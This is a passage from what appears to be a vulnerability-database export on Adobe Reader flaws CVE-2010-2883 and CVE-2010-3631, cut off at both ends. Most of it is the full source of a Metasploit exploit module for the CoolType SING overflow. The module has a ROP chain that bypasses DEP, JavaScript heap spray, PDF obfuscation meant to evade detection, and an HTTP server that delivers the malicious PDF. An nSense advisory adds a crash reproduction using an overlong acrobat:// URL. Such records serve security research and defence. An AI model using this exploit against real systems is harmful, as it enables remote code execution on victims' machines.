+ 2**6 + 2**17)) \npdf << nObfu(\"/FontBBox [-177 -269 1123 866]\") \npdf << nObfu(\"/FontFile2 \") << ioRef(10) \npdf << nObfu(\">>\") << eol \npdf << endobj \n \n# ttf stream \nxref << pdf.length \npdf << ioDef(10) << nObfu(\"<</Length %s /Length1 %s>>\" % [ttf.length, ttf.length]) << eol \npdf << \"stream\" << eol \npdf << ttf << eol \npdf << \"endstream\" << eol \npdf << endobj \n \n# js action \nxref << pdf.length \npdf << ioDef(11) << nObfu(\"<<\") \npdf << nObfu(\"/Type/Action/S/JavaScript/JS \") + ioRef(12) \npdf << nObfu(\">>\") << eol \npdf << endobj \n \n# js stream \nxref << pdf.length \ncompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js)) \npdf << ioDef(12) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol \npdf << \"stream\" << eol \npdf << compressed << eol \npdf << \"endstream\" << eol \npdf << endobj \n \n# trailing stuff \nxrefPosition = pdf.length \npdf << \"xref\" << eol \npdf << \"0 %d\" % (xref.length + 1) << eol \npdf << \"0000000000 65535 f\" << eol \nxref.each do |index| \npdf << \"%010d 00000 n\" % index << eol \nend \n \npdf << \"trailer\" << eol \npdf << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol \n \npdf << \"startxref\" << eol \npdf << xrefPosition.to_s() << eol \n \npdf << \"%%EOF\" << eol \npdf \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/93627/adobe_cooltype_sing.rb.txt"}, {"lastseen": "2016-12-05T22:20:23", "description": "", "published": "2010-10-06T00:00:00", "type": "packetstorm", "title": "nSense Vulnerability Research Security Advisory NSENSE-2010-001", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3631"], "modified": "2010-10-06T00:00:00", "id": "PACKETSTORM:94525", "href": "https://packetstormsecurity.com/files/94525/nSense-Vulnerability-Research-Security-Advisory-NSENSE-2010-001.html", "sourceData": "`nSense Vulnerability Research Security Advisory NSENSE-2010-001 \n--------------------------------------------------------------- \n \nAffected Vendor: Adobe \nAffected Product: Adobe Reader 9.3.4 for Macintosh \nPlatform: OS X \nImpact: User assisted code execution \nVendor response: Patch \nCredit: Knud / nSense \n \nDescription: Adobe Acrobat and Reader are prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Adobe Reader and Acrobat versions prior to and including 9.3.4 and 8.2.4 are affected. \n \nNOTE: This issue only affects Adobe Reader and Acrobat running on Apple Mac OS X \n \nTechnical details \n--------------------------------------------------------------- \n \nterminal 1: \n$ gdb --waitfor=AdobeReader \n \nterminal 2: \n$ open acrobat://`perl -e 'print \"A\" x 12000'` \n \nterminal 1: \n(gdb) cont \n[snip] \nProgram received signal EXC_BAD_ACCESS, Could not access memory. \nReason: KERN_INVALID_ADDRESS at address: 0xc00013d2 \n0x7ffa0d6a in AcroBundleThreadQuitProc () \n(gdb) set disassembly-flavor intel \n(gdb) x/i $pc \n0x7ffa0d6a <AcroBundleThreadQuitProc+2608>: mov BYTE PTR \n[ebp+eax-0x420],0x0 \n(gdb) i r ebp eax \nebp 0xbfffe908 0xbfffe908 \neax 0x2eea 12010 \n(gdb) \n \nAs can be seen from the above, we control the value in eax (in \nthis case 12010, the length of the acrobat:// + the 12000 A's). \n \nThis allows us to write the null byte anywhere in memory between \nebp-0x420 (0xBFFFE4E8) and the end of the stack. \n \nThe behaviour may be leveraged to modify the frame pointer, \nchanging the execution flow and thus permitting arbitrary code \nexecution in the context of the user running the program. \n \nTimeline: \nAug 10th Contacted vendor PSIRT \nAug 10th Vendor response. Vulnerability reproduced. \nAug 16th Status update request sent to vendor \nAug 17th Vendor response, still investigating \nSep 2nd Status update request sent to vendor \nSep 3rd Vendor response. Working on fix \nSep 22nd Contacted vendor regarding patch date \nSep 22nd Vendor response. Confirmed patch date. \nSep 23rd Corrected researcher name \nOct 1st Vendor sent CVE identifier CVE-2010-3631 \nOct 5th Vendor releases the patch \nOct 6th Advisory published \n \nhttp://www.nsense.fi http://www.nsense.dk \n \n \n \n$$s$$$$s. ,s$$$$s ,S$$$$$s. $$s$$$$s. ,s$$$$s ,S$$$$$s. \n$$$ `$$$ ($$( $$$ `$$$ $$$ `$$$ ($$( $$$ `$$$ \n$$$ $$$ `^$$s. $$$$$$$$$ $$$ $$$ `^$$s. $$$$$$$$$ \n$$$ $$$ )$$) $$$ $$$ $$$ )$$) $$$ \n$$$ $$$ ^$$$$$$7 `7$$$$$P $$$ $$$ ^$$$$$$7 `7$$$$$P \n \nD r i v e n b y t h e c h a l l e n g e _ \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/94525/NSENSE-2010-001.txt"}], "seebug": [{"lastseen": "2017-11-19T14:53:13", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2883"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-71008", "id": "SSV:71008", "sourceData": "\n ##\r\n# $Id: adobe_cooltype_sing.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'zlib'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking # aslr+dep bypass, js heap spray, rop, stack bof\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the Smart INdependent Glyplets (SING) table\r\n\t\t\t\thandling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior version are\r\n\t\t\t\tassumed to be vulnerable as well.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Unknown', # 0day found in the wild\r\n\t\t\t\t\t'@sn0wfl0w', # initial analysis\r\n\t\t\t\t\t'@vicheck', # initial analysis\r\n\t\t\t\t\t'jduck' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2010-2883' ],\r\n\t\t\t\t\t[ 'OSVDB', '67849'],\r\n\t\t\t\t\t[ 'URL', 'http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.adobe.com/support/security/advisories/apsa10-02.html' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'HTTP::compression' => 'gzip',\r\n\t\t\t\t\t'HTTP::chunked' => true,\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000,\r\n\t\t\t\t\t'BadChars' => "\\x00",\r\n\t\t\t\t\t'DisableNops' => true\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# Tested OK via Adobe Reader 9.3.4 on Windows XP SP3 -jjd\r\n\t\t\t\t\t# Tested OK via Adobe Reader 9.3.4 on Windows 7 -jjd\r\n\t\t\t\t\t[ 'Automatic', { }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Sep 07 2010',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t# NOTE: The 0day used Vera.ttf (785d2fd45984c6548763ae6702d83e20)\r\n\t\tpath = File.join( Msf::Config.install_root, "data", "exploits", "cve-2010-2883.ttf" )\r\n\t\tfd = File.open( path, "rb" )\r\n\t\t@ttf_data = fd.read(fd.stat.size)\r\n\t\tfd.close\r\n\r\n\t\tsuper\r\n\tend\r\n\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tprint_status("Sending crafted PDF to #{cli.peerhost}:#{cli.peerport}")\r\n\r\n\t\tttf_data = make_ttf()\r\n\r\n\t\tjs_data = make_js(regenerate_payload(cli).encoded)\r\n\r\n\t\t# Create the pdf\r\n\t\tpdf = make_pdf(ttf_data, js_data)\r\n\r\n\t\tsend_response(cli, pdf, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\n\tdef make_ttf\r\n\r\n\t\t# load the static ttf file\r\n\t\tttf_data = @ttf_data.dup\r\n\r\n\t\t# Build the SING table\r\n\t\tsing = ''\r\n\t\tsing << [\r\n\t\t\t0, 1, # tableVersionMajor, tableVersionMinor (0.1)\r\n\t\t\t0xe01, # glyphletVersion\r\n\t\t\t0x100, # embeddingInfo\r\n\t\t\t0, # mainGID\r\n\t\t\t0, # unitsPerEm\r\n\t\t\t0, # vertAdvance\r\n\t\t\t0x3a00 # vertOrigin\r\n\t\t].pack('vvvvvvvv')\r\n\t\t# uniqueName\r\n\t\t# "The uniqueName string must be a string of at most 27 7-bit ASCII characters"\r\n\t\t#sing << "A" * (0x254 - sing.length)\r\n\t\tsing << rand_text(0x254 - sing.length)\r\n\r\n\t\t# 0xffffffff gets written here @ 0x7001400 (in BIB.dll)\r\n\t\tsing[0x140, 4] = [0x4a8a08e2 - 0x1c].pack('V')\r\n\r\n\t\t# This becomes our new EIP (puts esp to stack buffer)\r\n\t\tret = 0x4a80cb38 # add ebp, 0x794 / leave / ret\r\n\t\tsing[0x208, 4] = [ret].pack('V')\r\n\r\n\t\t# This becomes the new eip after the first return\r\n\t\tret = 0x4a82a714\r\n\t\tsing[0x18, 4] = [ret].pack('V')\r\n\r\n\t\t# This becomes the new esp after the first return\r\n\t\tesp = 0x0c0c0c0c\r\n\t\tsing[0x1c, 4] = [esp].pack('V')\r\n\r\n\t\t# Without the following, sub_801ba57 returns 0.\r\n\t\tsing[0x24c, 4] = [0x6c].pack('V')\r\n\r\n\t\tttf_data[0xec, 4] = "SING"\r\n\t\tttf_data[0x11c, sing.length] = sing\r\n\r\n\t\tttf_data\r\n\tend\r\n\r\n\tdef make_js(encoded_payload)\r\n\r\n\t\t# The following executes a ret2lib using icucnv36.dll\r\n\t\t# The effect is to bypass DEP and execute the shellcode in an indirect way\r\n\t\tstack_data = [\r\n\t\t\t0x41414141, # unused\r\n\t\t\t0x4a8063a5, # pop ecx / ret\r\n\t\t\t0x4a8a0000, # becomes ecx\r\n\r\n\t\t\t0x4a802196, # mov [ecx],eax / ret # save whatever eax starts as\r\n\r\n\t\t\t0x4a801f90, # pop eax / ret\r\n\t\t\t0x4a84903c, # becomes eax (import for CreateFileA)\r\n\r\n\t\t\t# -- call CreateFileA\r\n\t\t\t0x4a80b692, # jmp [eax]\r\n\r\n\t\t\t0x4a801064, # ret\r\n\r\n\t\t\t0x4a8522c8, # first arg to CreateFileA (lpFileName / pointer to "iso88591")\r\n\t\t\t0x10000000, # second arg - dwDesiredAccess\r\n\t\t\t0x00000000, # third arg - dwShareMode\r\n\t\t\t0x00000000, # fourth arg - lpSecurityAttributes\r\n\t\t\t0x00000002, # fifth arg - dwCreationDisposition\r\n\t\t\t0x00000102, # sixth arg - dwFlagsAndAttributes\r\n\t\t\t0x00000000, # seventh arg - hTemplateFile\r\n\r\n\t\t\t0x4a8063a5, # pop ecx / ret\r\n\t\t\t0x4a801064, # becomes ecx\r\n\r\n\t\t\t0x4a842db2, # xchg eax,edi / ret\r\n\r\n\t\t\t0x4a802ab1, # pop ebx / ret\r\n\t\t\t0x00000008, # becomes ebx - offset to modify\r\n\r\n\t\t\t#\r\n\t\t\t# This points at a neat-o block of code that ... TBD\r\n\t\t\t#\r\n\t\t\t# and [esp+ebx*2],edi\r\n\t\t\t# jne check_slash\r\n\t\t\t# ret_one:\r\n\t\t\t# mov al,1\r\n\t\t\t# ret\r\n\t\t\t# check_slash:\r\n\t\t\t# cmp al,0x2f\r\n\t\t\t# je ret_one\r\n\t\t\t# cmp al,0x41\r\n\t\t\t# jl check_lower\r\n\t\t\t# cmp al,0x5a\r\n\t\t\t# jle check_ptr\r\n\t\t\t# check_lower:\r\n\t\t\t# cmp al,0x61\r\n\t\t\t# jl ret_zero\r\n\t\t\t# cmp al,0x7a\r\n\t\t\t# jg ret_zero\r\n\t\t\t# cmp [ecx+1],0x3a\r\n\t\t\t# je ret_one\r\n\t\t\t# ret_zero:\r\n\t\t\t# xor al,al\r\n\t\t\t# ret\r\n\t\t\t#\r\n\r\n\t\t\t0x4a80a8a6, # execute fun block\r\n\r\n\t\t\t0x4a801f90, # pop eax / ret\r\n\t\t\t0x4a849038, # becomes eax (import for CreateFileMappingA)\r\n\r\n\t\t\t# -- call CreateFileMappingA\r\n\t\t\t0x4a80b692, # jmp [eax]\r\n\r\n\t\t\t0x4a801064, # ret\r\n\r\n\t\t\t0xffffffff, # arguments to CreateFileMappingA, hFile\r\n\t\t\t0x00000000, # lpAttributes\r\n\t\t\t0x00000040, # flProtect\r\n\t\t\t0x00000000, # dwMaximumSizeHigh\r\n\t\t\t0x00010000, # dwMaximumSizeLow\r\n\t\t\t0x00000000, # lpName\r\n\r\n\t\t\t0x4a8063a5, # pop ecx / ret\r\n\t\t\t0x4a801064, # becomes ecx\r\n\r\n\t\t\t0x4a842db2, # xchg eax,edi / ret\r\n\r\n\t\t\t0x4a802ab1, # pop ebx / ret\r\n\t\t\t0x00000008, # becomes ebx - offset to modify\r\n\r\n\t\t\t0x4a80a8a6, # execute fun block\r\n\r\n\t\t\t0x4a801f90, # pop eax / ret\r\n\t\t\t0x4a849030, # becomes eax (import for MapViewOfFile\r\n\r\n\t\t\t# -- call MapViewOfFile\r\n\t\t\t0x4a80b692, # jmp [eax]\r\n\r\n\t\t\t0x4a801064, # ret\r\n\r\n\t\t\t0xffffffff, # args to MapViewOfFile - hFileMappingObject\r\n\t\t\t0x00000022, # dwDesiredAccess\r\n\t\t\t0x00000000, # dwFileOffsetHigh\r\n\t\t\t0x00000000, # dwFileOffsetLow\r\n\t\t\t0x00010000, # dwNumberOfBytesToMap\r\n\r\n\t\t\t0x4a8063a5, # pop ecx / ret\r\n\t\t\t0x4a8a0004, # becomes ecx - writable pointer\r\n\r\n\t\t\t0x4a802196, # mov [ecx],eax / ret - save map base addr\r\n\r\n\t\t\t0x4a8063a5, # pop ecx / ret\r\n\t\t\t0x4a801064, # becomes ecx - ptr to ret\r\n\r\n\t\t\t0x4a842db2, # xchg eax,edi / ret\r\n\r\n\t\t\t0x4a802ab1, # pop ebx / ret\r\n\t\t\t0x00000030, # becomes ebx - offset to modify\r\n\r\n\t\t\t0x4a80a8a6, # execute fun block\r\n\r\n\t\t\t0x4a801f90, # pop eax / ret\r\n\t\t\t0x4a8a0004, # becomes eax - saved file mapping ptr\r\n\r\n\t\t\t0x4a80a7d8, # mov eax,[eax] / ret - load saved mapping ptr\r\n\r\n\t\t\t0x4a8063a5, # pop ecx / ret\r\n\t\t\t0x4a801064, # becomes ecx - ptr to ret\r\n\r\n\t\t\t0x4a842db2, # xchg eax,edi / ret\r\n\r\n\t\t\t0x4a802ab1, # pop ebx / ret\r\n\t\t\t0x00000020, # becomes ebx - offset to modify\r\n\r\n\t\t\t0x4a80a8a6, # execute fun block\r\n\r\n\t\t\t0x4a8063a5, # pop ecx / ret\r\n\t\t\t0x4a801064, # becomes ecx - ptr to ret\r\n\r\n\t\t\t0x4a80aedc, # lea edx,[esp+0xc] / push edx / push eax / push [esp+0xc] / push [0x4a8a093c] / call ecx / add esp, 0x10 / ret\r\n\r\n\t\t\t0x4a801f90, # pop eax / ret\r\n\t\t\t0x00000034, # becomes eax\r\n\r\n\t\t\t0x4a80d585, # add eax,edx / ret\r\n\r\n\t\t\t0x4a8063a5, # pop ecx / ret\r\n\t\t\t0x4a801064, # becomes ecx - ptr to ret\r\n\r\n\t\t\t0x4a842db2, # xchg eax,edi / ret\r\n\r\n\t\t\t0x4a802ab1, # pop ebx / ret\r\n\t\t\t0x0000000a, # becomes ebx - offset to modify\r\n\r\n\t\t\t0x4a80a8a6, # execute fun block\r\n\r\n\t\t\t0x4a801f90, # pop eax / ret\r\n\t\t\t0x4a849170, # becomes eax (import for memcpy)\r\n\r\n\t\t\t# -- call memcpy\r\n\t\t\t0x4a80b692, # jmp [eax]\r\n\r\n\t\t\t0xffffffff, # this stuff gets overwritten by the block at 0x4a80aedc, becomes ret from memcpy\r\n\t\t\t0xffffffff, # becomes first arg to memcpy (dst)\r\n\t\t\t0xffffffff, # becomes second arg to memcpy (src)\r\n\t\t\t0x00001000, # becomes third arg to memcpy (length)\r\n\t\t\t#0x0000258b, # ??\r\n\t\t\t#0x4d4d4a8a, # ??\r\n\t\t].pack('V*')\r\n\r\n\t\tvar_unescape = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_shellcode = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tvar_start = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tvar_s = 0x10000\r\n\t\tvar_c = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_b = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_d = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_3 = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_i = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_4 = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tpayload_buf = ''\r\n\t\tpayload_buf << stack_data\r\n\t\tpayload_buf << encoded_payload\r\n\r\n\t\tescaped_payload = Rex::Text.to_unescape(payload_buf)\r\n\r\n\t\tjs = %Q|\r\nvar #{var_unescape} = unescape;\r\nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );\r\nvar #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );\r\nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};\r\n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);\r\n#{var_b} += #{var_shellcode};\r\n#{var_b} += #{var_c};\r\n#{var_d} = #{var_b}.substring(0, #{var_s}/2);\r\nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d};\r\n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);\r\nvar #{var_4} = new Array();\r\nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s";\r\n|\r\n\r\n\t\tjs\r\n\tend\r\n\r\n\tdef RandomNonASCIIString(count)\r\n\t\tresult = ""\r\n\t\tcount.times do\r\n\t\t\tresult << (rand(128) + 128).chr\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ioDef(id)\r\n\t\t"%d 0 obj \\n" % id\r\n\tend\r\n\r\n\tdef ioRef(id)\r\n\t\t"%d 0 R" % id\r\n\tend\r\n\r\n\r\n\t#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n\tdef nObfu(str)\r\n\t\t#return str\r\n\t\tresult = ""\r\n\t\tstr.scan(/./u) do |c|\r\n\t\t\tif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n\t\t\t\tresult << "#%x" % c.unpack("C*")[0]\r\n\t\t\telse\r\n\t\t\t\tresult << c\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\r\n\tdef ASCIIHexWhitespaceEncode(str)\r\n\t\tresult = ""\r\n\t\twhitespace = ""\r\n\t\tstr.each_byte do |b|\r\n\t\t\tresult << whitespace << "%02x" % b\r\n\t\t\twhitespace = " " * (rand(3) + 1)\r\n\t\tend\r\n\t\tresult << ">"\r\n\tend\r\n\r\n\r\n\tdef make_pdf(ttf, js)\r\n\r\n\t\t#swf_name = rand_text_alpha(8 + rand(8)) + ".swf"\r\n\r\n\t\txref = []\r\n\t\teol = "\\n"\r\n\t\tendobj = "endobj" << eol\r\n\r\n\t\t# Randomize PDF version?\r\n\t\tpdf = "%PDF-1.5" << eol\r\n\t\tpdf << "%" << RandomNonASCIIString(4) << eol\r\n\r\n\t\t# catalog\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(1) << nObfu("<<") << eol\r\n\t\tpdf << nObfu("/Pages ") << ioRef(2) << eol\r\n\t\tpdf << nObfu("/Type /Catalog") << eol\r\n\t\tpdf << nObfu("/OpenAction ") << ioRef(11) << eol\r\n\t\t# The AcroForm is required to get icucnv36.dll to load\r\n\t\tpdf << nObfu("/AcroForm ") << ioRef(13) << eol\r\n\t\tpdf << nObfu(">>") << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# pages array\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(2) << nObfu("<<") << eol\r\n\t\tpdf << nObfu("/MediaBox ") << ioRef(3) << eol\r\n\t\tpdf << nObfu("/Resources ") << ioRef(4) << eol\r\n\t\tpdf << nObfu("/Kids [") << ioRef(5) << "]" << eol\r\n\t\tpdf << nObfu("/Count 1") << eol\r\n\t\tpdf << nObfu("/Type /Pages") << eol\r\n\t\tpdf << nObfu(">>") << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# media box\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(3)\r\n\t\tpdf << "[0 0 595 842]" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# resources\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(4)\r\n\t\tpdf << nObfu("<<") << eol\r\n\t\tpdf << nObfu("/Font ") << ioRef(6) << eol\r\n\t\tpdf << ">>" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# page 1\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(5) << nObfu("<<") << eol\r\n\t\tpdf << nObfu("/Parent ") << ioRef(2) << eol\r\n\t\tpdf << nObfu("/MediaBox ") << ioRef(3) << eol\r\n\t\tpdf << nObfu("/Resources ") << ioRef(4) << eol\r\n\t\tpdf << nObfu("/Contents [") << ioRef(8) << nObfu("]") << eol\r\n\t\tpdf << nObfu("/Type /Page") << eol\r\n\t\tpdf << nObfu(">>") << eol # end obj dict\r\n\t\tpdf << endobj\r\n\r\n\t\t# font\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(6) << nObfu("<<") << eol\r\n\t\tpdf << nObfu("/F1 ") << ioRef(7) << eol\r\n\t\tpdf << ">>" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# ttf object\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(7) << nObfu("<<") << eol\r\n\t\tpdf << nObfu("/Type /Font") << eol\r\n\t\tpdf << nObfu("/Subtype /TrueType") << eol\r\n\t\tpdf << nObfu("/Name /F1") << eol\r\n\t\tpdf << nObfu("/BaseFont /Cinema") << eol\r\n\t\tpdf << nObfu("/Widths []") << eol\r\n\t\tpdf << nObfu("/FontDescriptor ") << ioRef(9)\r\n\t\tpdf << nObfu("/Encoding /MacRomanEncoding")\r\n\t\tpdf << nObfu(">>") << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# page content\r\n\t\tcontent = "Hello World!"\r\n\t\tcontent = "" +\r\n\t\t\t"0 g" + eol +\r\n\t\t\t"BT" + eol +\r\n\t\t\t"/F1 32 Tf" + eol +\r\n\t\t\t"32 Tc" + eol +\r\n\t\t\t"1 0 0 1 32 773.872 Tm" + eol +\r\n\t\t\t"(" + content + ") Tj" + eol +\r\n\t\t\t"ET"\r\n\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(8) << "<<" << eol\r\n\t\tpdf << nObfu("/Length %s" % content.length) << eol\r\n\t\tpdf << ">>" << eol\r\n\t\tpdf << "stream" << eol\r\n\t\tpdf << content << eol\r\n\t\tpdf << "endstream" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# font descriptor\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(9) << nObfu("<<")\r\n\t\tpdf << nObfu("/Type/FontDescriptor/FontName/Cinema")\r\n\t\tpdf << nObfu("/Flags %d" % (2**2 + 2**6 + 2**17))\r\n\t\tpdf << nObfu("/FontBBox [-177 -269 1123 866]")\r\n\t\tpdf << nObfu("/FontFile2 ") << ioRef(10)\r\n\t\tpdf << nObfu(">>") << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# ttf stream\r\n\t\txref << pdf.length\r\n\t\tcompressed = Zlib::Deflate.deflate(ttf)\r\n\t\tpdf << ioDef(10) << nObfu("<</Length %s/Filter/FlateDecode/Length1 %s>>" % [compressed.length, ttf.length]) << eol\r\n\t\tpdf << "stream" << eol\r\n\t\tpdf << compressed << eol\r\n\t\tpdf << "endstream" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# js action\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(11) << nObfu("<<")\r\n\t\tpdf << nObfu("/Type/Action/S/JavaScript/JS ") + ioRef(12)\r\n\t\tpdf << nObfu(">>") << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# js stream\r\n\t\txref << pdf.length\r\n\t\tcompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n\t\tpdf << ioDef(12) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol\r\n\t\tpdf << "stream" << eol\r\n\t\tpdf << compressed << eol\r\n\t\tpdf << "endstream" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t###\r\n\t\t# The following form related data is required to get icucnv36.dll to load\r\n\t\t###\r\n\r\n\t\t# form object\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(13)\r\n\t\tpdf << nObfu("<</XFA ") << ioRef(14) << nObfu(">>") << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# form stream\r\n\t\txfa = <<-EOF\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">\r\n<config xmlns="http://www.xfa.org/schema/xci/2.6/">\r\n<present><pdf><interactive>1</interactive></pdf></present>\r\n</config>\r\n<template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">\r\n<subform name="form1" layout="tb" locale="en_US">\r\n<pageSet></pageSet>\r\n</subform></template></xdp:xdp>\r\nEOF\r\n\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(14) << nObfu("<</Length %s>>" % xfa.length) << eol\r\n\t\tpdf << "stream" << eol\r\n\t\tpdf << xfa << eol\r\n\t\tpdf << "endstream" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t###\r\n\t\t# end form stuff for icucnv36.dll\r\n\t\t###\r\n\r\n\r\n\t\t# trailing stuff\r\n\t\txrefPosition = pdf.length\r\n\t\tpdf << "xref" << eol\r\n\t\tpdf << "0 %d" % (xref.length + 1) << eol\r\n\t\tpdf << "0000000000 65535 f" << eol\r\n\t\txref.each do |index|\r\n\t\t\tpdf << "%010d 00000 n" % index << eol\r\n\t\tend\r\n\r\n\t\tpdf << "trailer" << eol\r\n\t\tpdf << nObfu("<</Size %d/Root " % (xref.length + 1)) << ioRef(1) << ">>" << eol\r\n\r\n\t\tpdf << "startxref" << eol\r\n\t\tpdf << xrefPosition.to_s() << eol\r\n\r\n\t\tpdf << "%%EOF" << eol\r\n\t\tpdf\r\n\tend\r\n\r\nend\r\n\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-71008"}, {"lastseen": "2017-11-19T14:50:29", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Adobe Acrobat and Reader Array Indexing Remote Code Execution Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3631"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-69981", "id": "SSV:69981", "sourceData": "\n nSense Vulnerability Research Security Advisory NSENSE-2010-001\r\n ---------------------------------------------------------------\r\n\r\n Affected Vendor: Adobe\r\n Affected Product: Adobe Reader 9.3.4 for Macintosh\r\n Platform: OS X\r\n Impact: User assisted code execution\r\n Vendor response: Patch\r\n Credit: Knud / nSense\r\n \r\n Description: Adobe Acrobat and Reader are prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Adobe Reader and Acrobat versions prior to and including 9.3.4 and 8.2.4 are affected.\r\n\r\n NOTE: This issue only affects Adobe Reader and Acrobat running on Apple Mac OS X \r\n\r\n Technical details\r\n ---------------------------------------------------------------\r\n\r\n terminal 1:\r\n $ gdb --waitfor=AdobeReader\r\n\r\n terminal 2:\r\n $ open acrobat://`perl -e 'print "A" x 12000'`\r\n\r\n terminal 1:\r\n (gdb) cont\r\n [snip]\r\n Program received signal 